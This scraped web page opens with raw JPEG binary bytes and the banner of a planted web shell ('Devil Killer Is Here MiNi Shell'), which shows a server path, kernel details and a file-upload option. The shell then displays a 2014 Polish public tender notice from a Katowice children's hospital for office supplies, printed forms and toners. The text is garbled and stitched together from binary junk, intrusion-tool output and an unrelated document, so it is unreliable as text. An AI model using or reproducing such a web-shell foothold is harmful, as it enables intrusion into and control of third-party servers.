JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140723/246262-N-2014.html

<p class="kh_header"><b>Katowice: sukcesywne dostawy materiałów biurowych w tym: druki, tonery, papiery rejestrujące, pozostałe materiały.</b><br>
<b>Numer ogłoszenia: 246262 - 2014; data zamieszczenia: 23.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Kliniczny nr 6 Śląskiego Uniwersytetu Medycznego w Katowicach Górnośląskie Centrum Zdrowia Dziecka im. Jana Pawła II , ul. Medyków 16, 40-752 Katowice, woj. śląskie, tel. (032) 207 15 32, faks (032) 2071546, 252 6303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gczd.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> sukcesywne dostawy materiałów biurowych w tym: druki, tonery, papiery rejestrujące, pozostałe materiały..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1	Druki, książki medyczne, recepty z kodem kreskowym
2	Druki
3	Szpitalne karty obserwacyjne i zleceń dla Intensywnej Terapii do systemu HINZ
4	Materiały biurowe
5	Tonery
6	Papiery rejestrujące
7	Sztućce, opakowania jednorazowe.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 22.00.00.00-0, 39.22.21.10-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące posiadania uprawnień do wykonywania działalności będącej przedmiotem zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące posiadania wiedzy i doświadczenia w zakresie objętym przedmiotem zamówienia. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące dysponowania odpowiednim potencjałem technicznym. Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunek dotyczący: -sytuacji ekonomicznej i finansowej. Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie potwierdzające, że oferowany przedmiot zamówienia odpowiada wymaganiom określonym  w specyfikacji asortymentowo-cenowej</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1). W przypadku wspólnego ubiegania się o udzielenie zamówienia publicznego, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 2). Przepisy dotyczące wykonawcy stosuje się odpowiednio do Wykonawców, o których mowa w punkcie 1. 3). W przypadku wspólnego ubiegania się o udzielenie zamówienia: a) wymóg posiadania uprawnień określonych w art. 22 ust 1 powinien spełniać ten Wykonawca, który będzie wykonywać część zamówienia objętego obowiązkiem posiadania uprawnień określonych w punkcie III.3.1. b) każdy z wykonawców ubiegających się wspólnie o zamówienie musi oddzielnie udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust 1 ustawy Pzp (składając dokumenty i oświadczenia określone przez Zamawiającego w części III.4.2)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo Zamówień publicznych, Zamawiający dopuszcza zmianę zawartej umowy w trakcie jej trwania, w następujących przypadkach: a. obniżenia ceny jednostkowej przez Wykonawcę, b. zmiany urzędowej stawki podatku VAT, przy czym zmianie ulegnie cena brutto, a cena netto pozostanie niezmieniona, i jako obowiązujące z mocy prawa nie będą wymagały zgody obu stron wyrażonej w formie pisemnej (aneks), c. zmiany numeru katalogowego przez producenta, d. zmiany terminu obowiązywania umowy w przypadku nie wykorzystania przez Zamawiającego w trakcie trwania umowy pełnej ilości dostarczanego przedmiotu umowy - przy zachowaniu dotychczasowej ceny, e. zmiany producenta przedmiotu umowy, w przypadku gdy producent wskazany w ofercie przez Wykonawcę wycofał dany towar z produkcji - przy cenie nie większej niż w umowie lub jeżeli Wykonawca nie może zaoferować w takim przypadku towar innego producenta w cenie nie wyższej niż w umowie, rozwiązanie jej w zakresie dotyczącym tego towaru za porozumieniem stron, bez konieczności ponoszenia kary przez żadną ze stron umowy, f. przedłużenia terminu płatności, g. zmiany stawek opłat celnych wprowadzonych decyzjami odpowiednich władz państwowych. h. w zakresie danych identyfikacyjnych strony umowy takich jak np. firma, adres osoby upoważnione do kontaktów/odbioru lub inne zapisy dotyczące wskazania stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gczd.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W wersji papierowej SIWZ można uzyskać w siedzibie Zamawiającego. Cena 10 zł...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2014 godzina 10:00, miejsce: Siedziba Zamawiającego Kancelaria pok. nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Druki, książki medyczne, recepty z kodem kreskowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Książka Raportów Lekarskich
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	80
2	Książka Raportów Pielęgniarskich
format A4, ilość stron 400 (200 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	140
3	Książka Badań Zakładu Diagnostyki Obrazowej i Radiologii Zabiegowej
Pracownia Radiologii Klasycznej
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	brak wzoru	szt	72
4	Książka Badań Zakładu Diagnostyki Obrazowej i Radiologii Zabiegowej
Pracownia Zabiegów Naczyniowych
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	brak wzoru	szt	12
5	Książka Badań Zakładu Diagnostyki Obrazowej i Radiologii Zabiegowej
Pracownia USG
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	brak wzoru	szt	24
6	Książka Badań Zakładu Diagnostyki Obrazowej i Radiologii Zabiegowej
Pracownia Tomografii Komputerowej
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	brak wzoru	szt	12
7	Książka Zabiegów Gabinetu Zabiegowego Zespołu Poradni Specjalistycznych 
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	12
8	Książka Zabiegów, Badań i Konsultacji Zespołu Poradni Specjalistycznych
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	12
9	Książka Pracowni Endoskopii
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	3
10	Książka Chorych Oddziału
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	5
11	Lista Oczekujących Udzielenie Świadczenia Zdrowotnego 
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	5
12	książka Analityczna
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie szt	12
13	Książka Pracowni Analitycznych
format  2/3 A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	24
14	Dziennik Kancelaryjny
format A4, ilość stron 200 (100 kartek), oprawa twarda, szycie zeszytowe płaskie		szt	70
15	Książka Ewidencji Wyjść
format A4, ilość stron 200 (100 kartek), oprawa twarda, szycie zeszytowe płaskie		szt	2
16	Książka Raportów Centralnej Sterylizacji
format A4, ilość stron 200 (100 kartek), oprawa twarda, szycie zeszytowe płaskie		szt	12
17	Paszport Techniczny
Format A5, ilość stron 36 (18 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	150
18	Książka Główna Przychodni
format  A4, 200 stron(100 kartek)	szt	30
19	Pocztowa Książka Nadawcza
2/3 A4, 200 stron (100 kartek), oprawa miękka, szycie zeszytowe płaskie, samokopia		szt	25
20	Księga Główna Przyjęć i Wypisów format A3, 200 stron (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	2
21	Arkusz Spisu z natury
format  A4, 80 kartek, samokopiujące 1+1 szt	5
22	Druki RW 
format A5, 80 kartek, wielokopia		szt	100
23	Druki RW A5
format 1/3 A4, 80 kartek, wielokopia		szt	100
24	Skorowidz do Księgi Głównej
format 28x16 cm pionowo, 200 stron (100 kartek), oprawa twarda, szycie zeszytowe płaskie		szt	12
25	Wniosek o zaliczkę
format 1/2 A5, 100 kartek		szt	3
26	Rozliczenie zaliczki
format 1/2 A5, 100 kartek		szt	3
27	Książka Zgłoszonych Robót
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	4
28	Książka Wyjazdowa
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	2
29	Książka Kontroli Środków Odurzających i Substancji Psychotropowych
format A4, ilość stron ponumerowanych z otworami umożliwiającymi przesznurowanie 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	30
30	Książka Transfuzyjna
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	16
31	Książka Rejestrowa Badań Bakteriologicznych z Bloku Operacyjnego
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	5
32	Książka Rejestrowa Badań z Bloku Operacyjnego
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	5
33	Książka Badań Pracownia Audiologiczna Zespołu Poradni Specjalistycznych
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	6
34	Książka Zleceń Badań Kontrastowych
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	6
35	Książka Badań EEG
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie szt	2
36	Książka Badań EMG
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie		szt	2
37	Książka Dokonanych Operacji
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	brak wzoru	szt	24
38	Dowód wypłaty KW 
Bloczek, o objętości 80 kartek, drukowany na papierze samokopiującym; format A6
szt	10
39	Wniosek o udzielenie pożyczki
Bloczek o objętości 100 kartek, dwustronnie różny, drukowany na papierze offsetowym o gramaturze 70g/m2 , format A5		szt	3
40	Karta Pracy Wyjazdowego Zespołu Sanitarnego Typu N
Bloczek,format  A4, 80 kartek, samokopiujące 1+1		szt	10
41	Recepty bloczki numerowane z kodem kreskowym a 100 kartek 		szt	350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DRUKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Recepta Rekus 240x8 (1+1) składanka do drukarki OKI,
opakowanie zawiera 1000 arkuszy /2000 szt	szt	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szpitalne karty obserwacyjne i zleceń  dla Intensywnej Terapii do systemu HINZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Karta 1-dniowa I p 	szt	2000
2	Karta 1-dniowa VIII p 	szt	6800
3	Karta 7-dniowa IT 	szt	2700
4	Karta Badań zbiorcza VIII p	szt	860.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MATERIAŁY BIUROWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Agrafka średnia (op=12szt)	op	10
2	Dziurkacz   	szt	10
3	Etykiety samoprzylepne A4 48,5x25,4 (op=100 arkuszy)(arkusz=40 etykiet) 	op	92
4	Etykiety samoprzylepne A4 210x148,5 (op=100 arkuszy) (arkusz=2etykiety)	op	17
5	Folia do laminowania A4 (op=100 szt)	op	6
6	Grzbiety do bindowania średnie 12(op=100szt)	op	2
7	Grzbiety do bindowania małe 8 (op=100)	op	1
8	Identyfikatory	szt	50
9	Kalka ołówkowa A4 (op=100  arkuszy)	op	20
10	Kalkulator (12 miejsc po przecinku)	szt	10
11	Klej biurowy sztyft 12g/szt	szt	60
12	Kartony archiwizacyjne	szt	400
13	Kaseta video 180 min.	szt	5
14	Koperty C4 (op=250szt) szare	op	30
15	Koperty C5 (op=500szt) szare	op	10
16	Koperty C6 białe( op = 1000szt)	op	8
17	Koperta B4 (op=250 szt) szare
	op	122
18	Koperta B5 (op=500 szt) szare	op	50
19	Koperta RTG 37x45 (op=250 szt) szare	op	12
20	Marker czarny	szt	50
21	Marker do tablicy suchościeralnej	szt	45
22	Marker wodoodporny	szt	60
23	Marker olejowy SNOWMAN (czarny, czerwony, zielony, niebieski)	szt	10
24	Marker do płyt CD i DVD 	szt	20
25	Nożyczki biurowe 	szt	30
26	Ofertówka-koszulka A4 (op=100 szt)	op	70
27	Okładka do bindowania -przód-folia A4/100	op	8
28	Okładka do bindowania -tył-kolor A4/100	op	8
29	Papier ksero A4 500szt. 80g/m2	ryza	3500
30	Papier ksero A3 500szt. 80g/m2 	ryza	180
31	Papier ksero A5/500	ryza	410
32	Papier ksero zielony A4	ryza	35
33	Papier rolka FAX 210*30	szt	100
34	Papier do drukarki 1+0 karton	op	3
35	Papier do drukarki 1+1 karton	op	8
36	Płyty DVD + koperty. Płyty wysokiej jakości do archiwizacji, danych z okresem przechowywania min. 30 lat, o dużej prędkości zapisu niemniej niż x 16, o parametrach porównywalnych z płytami Verbatim, TDK, Sony.	szt	350
37	Płyta CD + koperty	szt	250
38	Płyty do nadruku CD  + koperty * wysokiej jakości, porównywalnej z płytami Verbatim, TDK, SONY.	szt	6000
39	Segregatory A4/70	szt	300
40	Skoroszyt oczkowy tekturowy	szt	500
41	Skoroszyt A4 z zawieszką plastikowy twardy 	szt	50
42	Skoroszyt A4 plastikowy twardy	szt	200
43	Spinacze duże/opakowanie jedn.	op	20
44	Spinacze średnie/opakowanie jedn.	op	300
45	Tablica korkowa	szt	5
46	Taśma bawełniana szer. 1cm	mb	200
47	Taśma klejąca biała 	szt	300
